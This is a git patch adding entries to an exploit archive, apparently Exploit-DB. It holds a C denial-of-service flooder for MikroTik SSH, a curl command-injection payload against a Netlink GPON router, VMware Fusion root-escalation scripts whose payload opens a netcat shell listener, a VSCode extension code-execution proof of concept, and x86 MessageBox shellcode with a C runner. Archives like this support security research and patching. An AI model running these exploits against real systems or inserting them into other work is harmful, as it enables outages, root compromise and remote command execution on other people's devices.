From 85cdf30ceab9e1a460a2262c06422900c5ef4648 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 19 Mar 2020 05:01:49 +0000 Subject: [PATCH] DB: 2020-03-19 7 changes to exploits/shellcodes NetBackup 7.0 - 'NetBackup INET Daemon' Unquoted Service Path Microsoft VSCode Python Extension - Code Execution VMWare Fusion - Local Privilege Escalation Microtik SSH Daemon 6.44.3 - Denial of Service (PoC) Netlink GPON Router 1.0.11 - Remote Code Execution Windows\x64 - Dynamic MessageBoxA or MessageBoxW PEB & Import Table Method Shellcode (232 bytes) --- exploits/hardware/remote/48228.txt | 103 ++++++++++++++++ exploits/hardware/webapps/48225.txt | 66 ++++++++++ exploits/linux/webapps/48212.txt | 2 +- exploits/macos/local/48232.md | 148 ++++++++++++++++++++++ exploits/multiple/local/48231.md | 16 +++ exploits/windows/local/48227.txt | 35 ++++++ files_exploits.csv | 5 + files_shellcodes.csv | 1 + shellcodes/windows/48229.txt | 185 ++++++++++++++++++++++++++++ 9 files changed, 560 insertions(+), 1 deletion(-) create mode 100644 exploits/hardware/remote/48228.txt create mode 100644 exploits/hardware/webapps/48225.txt create mode 100644 exploits/macos/local/48232.md create mode 100644 exploits/multiple/local/48231.md create mode 100644 exploits/windows/local/48227.txt create mode 100644 shellcodes/windows/48229.txt diff --git a/exploits/hardware/remote/48228.txt b/exploits/hardware/remote/48228.txt new file mode 100644 index 000000000..da3ac0fe1 --- /dev/null +++ b/exploits/hardware/remote/48228.txt @@ -0,0 +1,103 @@ +# Excploit Title: Microtik SSH Daemon 6.44.3 - Denial of Service (PoC) +# Author: Hosein Askari +# Date: 2020-03-18 +# Vendor Homepage: https://mikrotik.com/ +# Model: hAP lite +# Processor architecture: smips +# Affected Version: through 6.44.3 +# CVE: N/A + +#Description: +An uncontrolled resource consumption vulnerability in SSH daemon on MikroTik routers through v6.44.3 could allow remote attackers to generate CPU activity, trigger refusal of new authorized connections with SIGPIPE signal(SIGPIPE is the "broken pipe" signal, which is sent to a process when it attempts to write to a pipe whose read end has closed or when it attempts to write to a socket that is no longer open for reading. The default action is to terminate the process) and cause a reboot via connect and write system calls because of uncontrolled resource management. +#details: +The issue reported in 02/25/2020 to the Mikrotik +First response by Mikrotik in 02/26/2020 +The additional information about exploit and PoC video sent in 02/26/2020 +The vulnerability is accepted by "Reinis-Jānis S" from mikrotik security team in 02/27/2020 and asked for providing the CVE number and disclosure date +#PoC: +#Mitigation: +It can be mitigated with firewall filter and service port restrictions. +Solution: +Hardening and tuning the daemon for these 2 parameters: +1- Number of allowed unauthenticated connections to ssh daemon +2- Maximum number of connections at which we start dropping everything for ssh daemon +PoC: +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#define MAX_CON 32 +#define MAX_THREADS 16 + +int Socket(char *ip, char *port) { + struct addrinfo hints, *ret, *p; + int sock, r; + ssize_t bytes; + char buffer[2048]; + memset(&hints, 0, sizeof(hints)); + hints.ai_family = AF_UNSPEC; + hints.ai_socktype = SOCK_STREAM; + if((r=getaddrinfo(ip, port, &hints, &ret))!=0) { + return EXIT_FAILURE; + } + for(p = ret; p != NULL; p = p->ai_next) { + if((sock = socket(p->ai_family, p->ai_socktype, p->ai_protocol)) == -1) { + continue; + } + if(connect(sock, p->ai_addr, p->ai_addrlen)==-1) { + close(sock); + continue; + } + break; + } + if(ret) + freeaddrinfo(ret); + fprintf(stderr, "ESTABLISHED %s:%s\n", ip, port); + return sock; +} + +void signal_callback_handler(int signum){ + printf("Caught signal SIGPIPE %d\n",signum); +} + +void mal(char *ip, char *port, int id) { + int sockets[MAX_CON]; + int i, g=1, r; + for(i=0; i!= MAX_CON; i++) + sockets[i]=0; + signal(SIGPIPE, signal_callback_handler); + while(1) { + for(i=0; i!= MAX_CON; i++) { + if(sockets[i] == 0) + sockets[i] = Socket(ip, port); + r=write(sockets[i], "\0", 1); + if(r == -1) { + close(sockets[i]); + sockets[i] = Socket(ip, port); + } + } + usleep(200000); + } +} + +int main(int argc, char **argv) { + int i; + for(i=0; i!= MAX_THREADS; i++) { + if(fork()) + mal(argv[1], argv[2], i); + usleep(200000); + } + getc(stdin); + return 0; +} +######### + +Sincerely, +Hosein Askari \ No newline at end of file diff --git a/exploits/hardware/webapps/48225.txt b/exploits/hardware/webapps/48225.txt new file mode 100644 index 000000000..7a9481ea9 --- /dev/null +++ b/exploits/hardware/webapps/48225.txt @@ -0,0 +1,66 @@ +# Exploit Title: Netlink GPON Router 1.0.11 - Remote Code Execution +# Date: 2020-03-17 +# Exploit Author: shellord +# Vendor Homepage: https://www.netlink-india.com/ +# Version: 1.0.11 +# Tested on: Windows 10 +# CVE: N/A + +Exploit : + +curl -L -d "target_addr=;ls /&waninf=1_INTERNET_R_VID_154" +http://TARGETIP/boaform/admin/formPing + +Response : + + + + + +PINGԽ + + + + + + + + + + + + + + +
+
+

+
Finish +

+
+ 
+bin
+dev
+etc
+home
+image
+lib
+mnt
+proc
+sbin
+sys
+tmp
+usr
+var
+
+ + +
+
+
+ + \ No newline at end of file diff --git a/exploits/linux/webapps/48212.txt b/exploits/linux/webapps/48212.txt index 651e5c44d..1932a8908 100644 --- a/exploits/linux/webapps/48212.txt +++ b/exploits/linux/webapps/48212.txt @@ -6,7 +6,7 @@ # Software Link: http://centos-webpanel.com/ # Version: v6 - v7 # Tested on: Kali Linux - Windows 10 -# CVE : N/A +# CVE : CVE-2020-10230 # Type: Error Based SQL Injection # Payload: diff --git a/exploits/macos/local/48232.md b/exploits/macos/local/48232.md new file mode 100644 index 000000000..37d205307 --- /dev/null +++ b/exploits/macos/local/48232.md @@ -0,0 +1,148 @@ +Local Privilege Escalation via VMWare Fusion + +Overview: +A directory traversal vulnerability in VMware Fusion's SUID binaries can allow +an attacker to run commands as the root user. + +Tested Versions: +* VMware Fusion 10.1.3 (9472307) on macOS 10.13.6 +* VMware Fusion 11.0.0 (10120384) on macOS 10.14.1 +* VMware Fusion 11.0.2 (10952296) on macOS 10.14.1 +* VMware Fusion 11.5.0 (14634996) on macOS 10.15.1 +* VMware Fusion 11.5.1 (15018442) on macOS 10.15.1 + +Exercising: +1) Ensure the VMware Fusion services are not running. If open, quit the VMware + Fusion GUI. +2) Run one of the exploit script (exploit_fusion.sh or exploit_usb.sh). They + will remain running until manually stopped via CTRL-c. The exploit will start + a netcat listener as root on TCP port 3333. +3) Connect to the netcat listener: nc 127.0.0.1 3333 + +Details: +This vulnerability is a directory traversal bug inside of VMware Fusion. Several +of the programs included in VMware Fusion rely on the their path on disk to find +other libraries, helper utilities, and service daemons. Two such instances of +this code pattern in SUID programs can be found in the "Open VMware Fusion +Services" executable and the "Open VMware USB Arbitrator Service" executable. +These programs try to open the service programs by looking for the files: + +Open VMware Fusion Services: +$DIRECTORY_WITH_SUID_EXECUTABLE/../../../Contents/Library/services/VMware Fusion Services +Open VMware USB Arbitrator Service: +$DIRECTORY_WITH_SUID_EXECUTABLE/../../../Contents/Library/services/VMware USB Arbitrator Service + +While ordinarily this is fine, as any attempt to copy the programs will not copy +the SUID ownership of the file and any attempt to the move the programs will +fail without root access. Furthermore symbolic links will not trick the programs +into using the new location. However, on macOS unprivileged users can create +hard links to SUID executables, which will trick the programs. Thus, by creating +an adequate directory layout and hard linking to the SUID programs, we can trick +them into running an executable of our choice as the root user. The included +exploit_usb.sh and exploit_fusion.sh scripts setup the correct directory +structure and hard link, compile the payload, and run the linked program in +order to start a netcat listener as root on TCP port 3333. + +In addition to the two SUID executables listed above, the SUID executable +"vmware-authd" is also vulnerable to this bug. vmware-authd tries to load two +libraries, libcrypto and libssl, from the incorrect directory. However, the two +libraries must be signed by apple or with an apple distributed signing +certificate from an organization containing the word "VMware". As such, this bug +is harder to exploit in vmware-authd. Depending on how strict Apple's developer +verification process is, it may be possible to fool Apple into granting a +matching certificate by hiding VMware within a phrase, such as with a +certificate for "Never Mind Where cloud services inc (NVMware Inc)". + +One limitation to this vulnerability is that these two vulnerable service +openers will not try to open their services if the service is already running. +Thus, the exploit will not work if the "VMware USB Arbitrator Service" and +"VMware Fusion Services" services are already running. Thus, if the VMware +Fusion GUI is open, this vulnerability cannot be exploited. However, closing the +GUI will stop the services associated with the vulnerable service openers and +make the vulnerability once again exploitable. In contrast, the library +injection attack is not subject to these restrictions (but requires the +appropriate certificate). + +As a side note, the vulnerable code is also used in VMware Workstation on Linux. +However, Linux does not allow an unprivileged user to create hard links to files +they do not own. As such, this bug is not exploitable in VMware Workstation on +Linux. + +Timeline: +2019.11.12 Reported to VMware +2019.12.18 VMware confirms they can reproduce the issue +2019.12.24 Asked for status update, were told we'd get an update in early Jan +2020.01.08 Requested status update, were told fix scheduled for April 2020 +2020.01.15 Called VMware to discuss +2020.01.21 Follow up meeting with VMware to discuss +2020.03.17 VMware releases patch & public disclosure + + + + + + + + + + + + + +## exploit_fusion.sh +``` +#!/bin/sh + +# Remake the necessary folder structure +rm -rf a Contents +mkdir -p Contents/Library/services/ +mkdir -p a/b/c/ + +# Build our payload +clang payload.c -o "Contents/Library/services/VMware Fusion Services" + +# Create a hard link to the VMware SUID opener program +ln /Applications/VMware\ Fusion.app/Contents/Library/services/Open\ VMware\ Fusion\ Services a/b/c/linked + +# Run the linked program, which causes it to be confused about the path, and +# launch our payload. Additionally if our payload exits, VMware will relaunch +# it +a/b/c/linked +``` +## exploit_fusion.sh EOF + + +## exploit_usb.sh +``` +#!/bin/sh + +# Remake the necessary folder structure +rm -rf a Contents +mkdir -p Contents/Library/services/ +mkdir -p a/b/c/ + +# Build our payload +clang payload.c -o "Contents/Library/services/VMware USB Arbitrator Service" + +# Create a hard link to the VMware SUID opener program +ln /Applications/VMware\ Fusion.app/Contents/Library/services/Open\ VMware\ USB\ Arbitrator\ Service a/b/c/linked + +# Run the linked program, which causes it to be confused about the path, and +# launch our payload. Additionally if our payload exits, VMware will relaunch +# it +a/b/c/linked +``` +## exploit_usb.sh EOF + + +## payload.c +``` +#include +#include +int main(int argc, char**argv) { + setuid(0); + system("rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc -l 3333 > /tmp/f"); + return 0; +} +``` +## payload.c EOF \ No newline at end of file diff --git a/exploits/multiple/local/48231.md b/exploits/multiple/local/48231.md new file mode 100644 index 000000000..a4029b61b --- /dev/null +++ b/exploits/multiple/local/48231.md @@ -0,0 +1,16 @@ +# VSCode Python Extension Code Execution + +This repository contains the Proof-of-Concept of a code execution vulnerability discovered in the [Visual Studio Code](https://code.visualstudio.com/) Python extension. + +>TL;DR: VScode may use code from a virtualenv found in the project folders without asking the user, for things such as formatting, autocompletion, etc. This insecure design leads to arbitrary code execution by simply cloning and opening a malicious Python repository. + +You can read more about this vulnerability on our blog: [https://blog.doyensec.com/2020/03/16/vscode_codeexec.html](https://blog.doyensec.com/2020/03/16/vscode_codeexec.html). + +## HowTo + +- Clone the 'malicious' repository with `git clone https://github.com/doyensec/VSCode_PoC_Oct2019.git` +- Add the cloned repo to a VSCode workspace on macOS. Note that the vulnerability affects all platforms, but the PoC is executing *Calculator.app* +- Open `test.py` in VScode + + +Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/48231.zip \ No newline at end of file diff --git a/exploits/windows/local/48227.txt b/exploits/windows/local/48227.txt new file mode 100644 index 000000000..e94bdba1e --- /dev/null +++ b/exploits/windows/local/48227.txt @@ -0,0 +1,35 @@ +# Exploit Title: NetBackup 7.0 - 'NetBackup INET Daemon' Unquoted Service Path +# Discovery by: Alan Mondragon "El Masas" +# Discovery Date: 2020-03-17 +# Vendor Homepage: https://www.veritas.com/ +# Software Link : https://www.veritas.com/ +# Veritas +# Tested Version: 7.0 +# Vulnerability Type: Unquoted t Service Path +# Tested on OS: Windows Server 2008 R2 en + +# Step to discover Unquoted Service Path: + + +C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """ Auto +NetBackup Client Service NetBackup INET Daemon + C:\Program Files\Veritas\NetBackup\bin\bpinetd.exe + Auto +C:\>sc qc "NetBackup INET Daemon" +[SC] QueryServiceConfig SUCCESS + SERVICE_NAME: NetBackup INET Daemon + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files\Veritas\NetBackup\bin\bpinetd.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : NetBackup Client Service + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +#Exploit: +# A successful attempt would require the local user to be able to insert their code in the system root path +# undetected by the OS or other security applications where it could potentially be executed during +# application startup or reboot. If successful, the local user's code would execute with the elevated +# privileges of the application. \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 568c11513..de996b825 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -10991,6 +10991,9 @@ id,file,description,date,author,type,platform,port 48193,exploits/windows/local/48193.txt,"ASUS AXSP 1.02.00 - 'asComSvc' Unquoted Service Path",2020-03-11,"Roberto Piña",local,windows, 48206,exploits/windows/local/48206.txt,"ASUS AAHM 1.00.22 - 'asHmComSvc' Unquoted Service Path",2020-03-12,"Roberto Piña",local,windows, 48211,exploits/windows/local/48211.py,"AnyBurn 4.8 - Buffer Overflow (SEH)",2020-03-13,"Richard Davy",local,windows, +48227,exploits/windows/local/48227.txt,"NetBackup 7.0 - 'NetBackup INET Daemon' Unquoted Service Path",2020-03-18,"El Masas",local,windows, +48231,exploits/multiple/local/48231.md,"Microsoft VSCode Python Extension - Code Execution",2020-03-17,Doyensec,local,multiple, +48232,exploits/macos/local/48232.md,"VMWare Fusion - Local Privilege Escalation",2020-03-17,Grimm,local,macos, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -18046,6 +18049,7 @@ id,file,description,date,author,type,platform,port 48214,exploits/hardware/remote/48214.py,"Drobo 5N2 4.1.1 - Remote Command Injection",2020-03-13,"Ian Sindermann",remote,hardware, 48223,exploits/linux/remote/48223.rb,"Rconfig 3.x - Chained Remote Code Execution (Metasploit)",2020-03-17,Metasploit,remote,linux, 48224,exploits/multiple/remote/48224.rb,"ManageEngine Desktop Central - Java Deserialization (Metasploit)",2020-03-17,Metasploit,remote,multiple, +48228,exploits/hardware/remote/48228.txt,"Microtik SSH Daemon 6.44.3 - Denial of Service (PoC)",2020-03-18,FarazPajohan,remote,hardware, 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -42478,3 +42482,4 @@ id,file,description,date,author,type,platform,port 48219,exploits/php/webapps/48219.py,"PHPKB Multi-Language 9 - Authenticated Remote Code Execution",2020-03-16,"Antonio Cannito",webapps,php, 48220,exploits/php/webapps/48220.py,"PHPKB Multi-Language 9 - Authenticated Directory Traversal",2020-03-16,"Antonio Cannito",webapps,php, 48221,exploits/php/webapps/48221.py,"PHPKB Multi-Language 9 - 'image-upload.php' Authenticated Remote Code Execution",2020-03-16,"Antonio Cannito",webapps,php, +48225,exploits/hardware/webapps/48225.txt,"Netlink GPON Router 1.0.11 - Remote Code Execution",2020-03-18,shellord,webapps,hardware, diff --git a/files_shellcodes.csv b/files_shellcodes.csv index b8bdbc71e..d1b7ca9e2 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -1016,3 +1016,4 @@ id,file,description,date,author,type,platform 47980,shellcodes/windows/47980.txt,"Windows/x86 - Dynamic Bind Shell + Null-Free Shellcode (571 Bytes)",2020-01-30,boku,shellcode,windows 48032,shellcodes/linux/48032.py,"Linux/x86 - Bind Shell Generator Shellcode (114 bytes)",2020-02-10,boku,shellcode,linux 48116,shellcodes/windows_x86/48116.c,"Windows\x86 - Null-Free WinExec Calc.exe Shellcode (195 bytes)",2020-02-24,boku,shellcode,windows_x86 +48229,shellcodes/windows/48229.txt,"Windows\x64 - Dynamic MessageBoxA or MessageBoxW PEB & Import Table Method Shellcode (232 bytes)",2020-03-18,boku,shellcode,windows diff --git a/shellcodes/windows/48229.txt b/shellcodes/windows/48229.txt new file mode 100644 index 000000000..94fd9912e --- /dev/null +++ b/shellcodes/windows/48229.txt @@ -0,0 +1,185 @@ +# Shellcode Title: Windows\x64 Dynamic MessageBoxA or MessageBoxW PEB & Import Table Method Shellcode (232 bytes) +# Shellcode Author: Bobby Cooke +# Date: March 2020-03-17 +# Tested On: +# Windows 10 Pro 1909 (x86): HelpPane.exe, notepad.exe, certutil.exe +# Windows 10 Pro 1909 (x86_64): mmc.exe, xwizard.exe +# [!] Will only work if MessageBoxA or MessageBoxW exist in the Import Table of the Host PE + +; Create new StackFrame + push ebp + mov ebp, esp + sub esp, 0x10 + +; Dynamically find the base address of the executable image from the PEB +; FS_Register > TEB > PEB > &ImageBase + xor ecx, ecx + mul ecx ; Clears EAX, ECX, EDX Registers + mov ebx, eax ; clear EBX Register + mov ebx, [fs:ebx+0x30] ; get PEB address = TEB+0x30 + mov ebx, [ebx+0x8] ; get Image Base Addr = PEB+0x8 + push ebx ; save &ImageBase in EBX + pop eax ; copy &ImageBase to EAX + +; Get the Address of the Import Table +; DOS_Header > PE_Signature > ImportTable + add eax, [ebx+0x3C] ; EAX = &PE_Signature + mov dl, 0x80 ; &PE_Signature+0x80 = &ImportTable_RVA + add ax, dx ; EAX = &ImportTable_RVA + mov edx, [eax] ; EDX = RVA ImportTable + add edx, ebx ; EDX = &ImportTable + add dl, 0xC ; EDX = &Name_RVA of first Imported DLL + +; Create string 'USER32' + mov cx, 0x3233 ; 23 : 3233 + push ecx ; push "23, 0x0000" + push 0x52455355 ; RESU : 52455355 + mov [ebp-0x4], esp + + +; Find the Name RVA for user32.dll within the Import Table +; ImportTable > ImportDirectoryTable > LoopNameRVA's + xor ecx, ecx ; ECX = Counter + +fUser32Name: + push edx ; EDX = &Name_RVA of first Imported DLL + xor eax, eax + mov al, 0x14 ; &Name_RVA's are every 20 bytes + mul cl ; Counter * 20 bytes + add [esp], eax + pop eax ; EAX = &Name_RVA of Nth DLL + push eax + mov esi, [ebp-0x4] ; ESI = &String + mov edi, [eax] ; EDI = RVA Name of Nth DLL + add edi, ebx ; EDI = &Name of Nth DLL + push ecx ; save counter to stack + xor ecx, ecx + cld ; clear direction flag = Process strings from left to right + mov cl, 0x6 ; ECX = String Length + repe cmpsb ; compare first 6 bytes of & + pop ecx ; ECX = Counter + jz foundUser32Name ; If string at &Name_RVA == "USER32", then end loop + pop eax ; Pickup String Addr to fix stack + inc ecx ; else Counter ++ + jmp short fUser32Name ; restart the loop + +foundUser32Name: + pop eax ; EAX = &Name_RVA of user32.dll + mov [ebp-0x8], eax ; [ESP-0x8] = &Name_RVA of user32.dll + sub al, 0xC ; EAX = &User32_ImportNameTable_RVA + mov eax, [eax] ; EAX = User32_ImportNameTable_RVA + add eax, ebx ; EAX = &User32_ImportNameTable + mov [ebp-0xC], eax ; [ESP-0xC] = &User32_ImportNameTable + +; Create string 'MessageBoxA' + mov ecx, 0x41786f6f ; Axoo : 41786f6f + shr ecx, 8 + push ecx ; "oxA,0x00" + push 0x42656761 ; Bega : 42656761 + push 0x7373654d ; sseM : 7373654d + + jmp Counter + +MessageBoxW: + mov byte [esp+0xA], 0x57 ; Change A to W + mov eax, [ebp-0xC] ; EAX = &User32_ImportNameTable + +; Find the Name RVA for MessageBoxA within the Import Table +; ImportTable > ImportDirectoryTable > LoopNameRVA's + +Counter: + xor ecx, ecx + +fNameLoop: + mov esi, esp ; ESI = "MessageBoxA,0x00" + xor edx, edx + mov edi, [eax] ; EDI = RVA NameString + cmp edi, edx ; See if we checked all imported function names + je MessageBoxW + add edi, ebx ; EDI = &NameString of Nth Function + inc edi ; skip the first 2 bytes - Ordinal Value + inc edi ; skip the first 2 bytes + push ecx ; push counter value + xor ecx, ecx + cld ; clear direction flag = Process strings from left to right + mov cl, 0xB ; ECX = String Length + repe cmpsb ; compare first 11 bytes + pop ecx ; ECX = Counter value + jz foundName ; If string at &NameString == "MessageBox-", then end loop + mov dl, 0x4 + add eax, edx ; Next RVA NameString of Imported User32.dll function + inc ecx ; Counter ++ + jmp short fNameLoop ; restart the loop + +foundName: + mov eax, [ebp-0x8] ; EAX = &User32_Name_RVA + add al, 0x4 ; EAX = &User32_ImportAddressTable_RVA + mov edi, [eax] ; EDI = User32_ImportAddressTable_RVA + add edi, ebx ; EDI = &User32_ImportNameTable + xor eax, eax + mov al, 0x4 + mul cx ; Counter * 4 = Offset MessageBoxA in Table + add eax, edi ;[EAX] = &MessageBoxA + mov eax, [eax] ; EAX = &MessageBoxA + + mov byte bl, [esp+0xA] ; DL = 'A' or 'W' + +;CALL to MessageBoxA +; hOwner = NULL +; Text = "BOKU" +; Title = "BOKU" +; Style = MB_OK|MB_APPLMODAL + xor ecx, ecx ; clear ecx register + push ecx ; string terminator 0x00 for string "BOKU" +; MessageBoxA or MessageBoxW? + cmp bl, 0x41 ; if BL = 'A', then + je MsgBoxA ; push ASCII string +; String = "B-O-K-U-" + push 0x2d552d4b ; -U-K : 2d552d4b + push 0x2d4f2d42 ; -O-B : 2d4f2d42 + mov edx, esp ; EDX = &String +UnicodeStrLoop: + inc edx ; 1st Char +1 + mov byte [edx], ch ; Null byte after ever char in Unicode String + inc edx ; Every Other Char +2 + inc ecx ; LoopCounter ++ + cmp cl, 0x4 ; If end of string, then + je pushArgs ; Push arguments to stack for MessageBox- Call + jmp short UnicodeStrLoop +MsgBoxA: + push 0x554b4f42 ; UKOB : 554b4f42 +pushArgs: + xor ecx, ecx + mov ebx, esp ; EBX = &String + push ecx + push ebx + push ebx + push ecx + call eax ; Call MessageBox- Function + +############################################################################################################################ + +#include +#include + +char code[] = \ +"\x55\x89\xe5\x83\xec\x10\x31\xc9\xf7\xe1\x89\xc3\x64\x8b\x5b\x30\x8b\x5b" +"\x08\x53\x58\x03\x43\x3c\xb2\x80\x66\x01\xd0\x8b\x10\x01\xda\x80\xc2\x0c" +"\x66\xb9\x33\x32\x51\x68\x55\x53\x45\x52\x89\x65\xfc\x31\xc9\x52\x31\xc0" +"\xb0\x14\xf6\xe1\x01\x04\x24\x58\x50\x8b\x75\xfc\x8b\x38\x01\xdf\x51\x31" +"\xc9\xfc\xb1\x06\xf3\xa6\x59\x74\x04\x58\x41\xeb\xde\x58\x89\x45\xf8\x2c" +"\x0c\x8b\x00\x01\xd8\x89\x45\xf4\xb9\x6f\x6f\x78\x41\xc1\xe9\x08\x51\x68" +"\x61\x67\x65\x42\x68\x4d\x65\x73\x73\xeb\x08\xc6\x44\x24\x0a\x57\x8b\x45" +"\xf4\x31\xc9\x89\xe6\x31\xd2\x8b\x38\x39\xd7\x74\xec\x01\xdf\x47\x47\x51" +"\x31\xc9\xfc\xb1\x0b\xf3\xa6\x59\x74\x07\xb2\x04\x01\xd0\x41\xeb\xe0\x8b" +"\x45\xf8\x04\x04\x8b\x38\x01\xdf\x31\xc0\xb0\x04\x66\xf7\xe1\x01\xf8\x8b" +"\x00\x8a\x5c\x24\x0a\x31\xc9\x51\x80\xfb\x41\x74\x18\x68\x4b\x2d\x55\x2d" +"\x68\x42\x2d\x4f\x2d\x89\xe2\x42\x88\x2a\x42\x41\x80\xf9\x04\x74\x07\xeb" +"\xf4\x68\x42\x4f\x4b\x55\x31\xc9\x89\xe3\x51\x53\x53\x51\xff\xd0"; + +int main(int argc, char **argv) +{ + int (*func)(); + func = (int(*)()) code; + (int)(*func)(); +} \ No newline at end of file